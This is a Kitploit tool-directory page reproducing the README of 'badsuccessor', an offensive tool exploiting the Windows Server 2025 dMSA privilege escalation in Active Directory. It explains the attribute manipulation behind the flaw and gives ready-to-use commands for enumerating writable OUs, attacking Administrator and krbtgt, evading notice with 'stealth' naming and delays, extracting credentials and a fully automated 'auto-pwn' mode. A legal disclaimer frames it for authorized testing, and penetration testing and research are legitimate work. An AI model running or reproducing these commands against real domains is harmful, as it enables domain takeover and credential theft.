Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
badsuccessor — Exploits the Windows Server 2025 dMSA privilege escalation vulnerability to enumerate writable OUs, escalate to arbitrary domain users, extract credentials, and enable domain takeover in authorized AD security assessments. | Kitploit
Tools/GitHubGitHub/cybrly/badsuccessor
Privilege EscalationReconnaissancePersistence MechanismsExploitationLateral MovementInformation GatheringPost-ExploitationPenetration TestingRed TeamingAdversarial Attack
GitHub
12220191 year agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
cybrly/badsuccessor

badsuccessor

Exploits the Windows Server 2025 dMSA privilege escalation vulnerability to enumerate writable OUs, escalate to arbitrary domain users, extract credentials, and enable domain takeover in authorized AD security assessments.

View Repository

BadSuccessor.py

A penetration testing tool that exploits the dMSA (delegated Managed Service Account) privilege escalation vulnerability in Windows Server 2025 Active Directory environments.

⚠️ Legal Disclaimer

This tool is for authorized penetration testing and security research purposes only. Use of this tool against systems without explicit written permission is illegal and unethical. The authors are not responsible for any misuse or damage caused by this tool.

⚠️ Development Status & Environmental Testing Disclaimer

IMPORTANT: This tool is under active development and testing.

Current Status

  • Windows Server 2025 Adoption: As of May 2025, Windows Server 2025 is still in early adoption phase with limited production deployments
  • Environmental Variations: Due to the limited number of Windows Server 2025 environments available for testing, this tool may encounter untested configurations
  • Ongoing Development: We are actively refining the tool as more environmental variations are deployed and tested

What This Means

  • Expect Updates: The tool will receive frequent updates as new environment types are tested
  • Report Issues: Your feedback is crucial - please report any issues or edge cases you encounter
  • Test Carefully: Always test in a non-production environment first
  • Schema Variations: Different Windows Server 2025 builds may implement dMSA attributes differently
  • Feature Stability: While core functionality is stable, some features may require adjustment for specific environments

Known Variables Being Tracked

  • Different Windows Server 2025 build versions
  • Schema attribute naming conventions
  • Regional/localized AD implementations
  • Hybrid cloud configurations
  • Various AD functional levels
  • Different security hardening configurations

Community Testing

We encourage the security community to:

  • Test in diverse environments
  • Share findings (sanitized)
  • Submit pull requests for compatibility improvements
  • Report environmental variations

By using this tool, you acknowledge that it is under active development and may require modifications for your specific environment.

📋 Overview

BadSuccessor exploits a privilege escalation vulnerability in Windows Server 2025's delegated Managed Service Account (dMSA) feature. The vulnerability allows attackers with minimal permissions to escalate privileges to any user in the domain, including Domain Administrators.

Research Credit

This tool is based on the excellent research by Yuval Gordon from Akamai Technologies:

  • BadSuccessor: Abusing dMSA to Escalate Privileges in Active Directory

🎯 Vulnerability Details

The vulnerability exists in the dMSA migration process where:

  1. An attacker creates a malicious dMSA in any writable OU
  2. Sets msDS-ManagedAccountPrecededByLink or ms-DS-Managed-Account-Preceded-By-Link to point to a target user
  3. Sets msDS-DelegatedMSAState or ms-DS-Delegated-MSA-State to 2 (migration completed)
  4. The KDC automatically grants the dMSA all privileges of the target user via PAC inheritance

Additionally, the KERB-DMSA-KEY-PACKAGE structure contains the target user's password keys, enabling credential extraction.

✅ Prerequisites

System Requirements

  • Linux machine (non-domain joined)
  • Python 3.6+
  • Network access to target Active Directory environment
  • Target domain must have at least one Windows Server 2025 Domain Controller

Python Dependencies

pip3 install ldap3 pyasn1 pycryptodome
pip3 install impacket==0.12.0

Note: The tool has been tested with impacket 0.12.0. Version compatibility warnings are displayed at runtime.

Optional Dependencies

# For DNS discovery
pip3 install dnspython

# For enhanced Kerberos support (system packages)
# Ubuntu/Debian
sudo apt-get install libkrb5-dev libgssapi-krb5-2

# RHEL/CentOS/Fedora
sudo yum install krb5-devel

Required Permissions

  • Valid domain credentials (any user account)
  • ANY of the following permissions on at least one Organizational Unit:
    • CreateChild permission
    • Write permission
    • GenericWrite permission
    • GenericAll permission
    • Member of default groups with write access (e.g., Authenticated Users)
  • Tool automatically discovers all writable OUs and shows specific permissions

🚀 Installation

git clone https://github.com/cybrly/badsuccessor.git
cd badsuccessor
pip3 install -r requirements.txt
chmod +x badsuccessor.py

requirements.txt

ldap3>=2.9.1
pyasn1>=0.4.8
pycryptodome>=3.15.0
impacket==0.12.0
dnspython>=2.1.0

📖 Usage

Basic Syntax

python3 badsuccessor.py -d <domain> -u <username> -p <password> [options]

Quick Start Examples

1. Dry Run Mode (NEW) - Test Without Making Changes

# Simulate attack to verify viability
python3 badsuccessor.py -d corp.local -u john -p Password123 --dry-run --target Administrator

# Dry run with specific OU
python3 badsuccessor.py -d corp.local -u john -p Password123 --dry-run --target Administrator --ou-dn "OU=ServiceAccounts,DC=corp,DC=local"

2. Enumerate Environment

# Check Windows Server 2025 schema support
python3 badsuccessor.py -d corp.local -u john -p Password123 --check-schema

# Find ALL writable OUs with detailed permissions
python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate

# List high-value targets
python3 badsuccessor.py -d corp.local -u john -p Password123 --list-targets

# Validate specific target account
python3 badsuccessor.py -d corp.local -u john -p Password123 --validate-target Administrator

3. Perform Attack

# Basic attack against Administrator
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator

# Stealth mode with innocuous naming
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator --stealth --random-delay 30

# Attack with custom dMSA attributes
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target krbtgt \
  --dmsa-name legit_service --dmsa-description "Legitimate Service Account" \
  --dmsa-display-name "Production Service"

# Attack with custom naming pattern
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator \
  --dmsa-pattern "svc{random}prod"

4. Extract Credentials

# Extract credentials for multiple users
python3 badsuccessor.py -d corp.local -u john -p Password123 --extract-creds --targets Administrator,krbtgt,svc_sql

# Auto-pwn mode (fully automated)
python3 badsuccessor.py -d corp.local -u john -p Password123 --auto-pwn

5. Session Management (NEW)

# List all sessions
python3 badsuccessor.py -d corp.local -u john -p Password123 --list-sessions

# Resume a previous session
python3 badsuccessor.py -d corp.local -u john -p Password123 --session-id corp.local_john_1234567890_abcd1234

# Clean up all dMSAs from a session
python3 badsuccessor.py -d corp.local -u john -p Password123 --cleanup-session SESSION_ID

# Clean up all dMSAs from current session
python3 badsuccessor.py -d corp.local -u john -p Password123 --cleanup-all

6. Export Results (NEW)

# Export enumeration results to JSON
python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --export-json results.json

# Export to CSV
python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --export-csv writable_ous.csv

# Generate HTML report
python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --export-html report.html

# Combined operation with exports
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator \
  --export-json attack_results.json --export-html attack_report.html

Command Line Options

Download Tool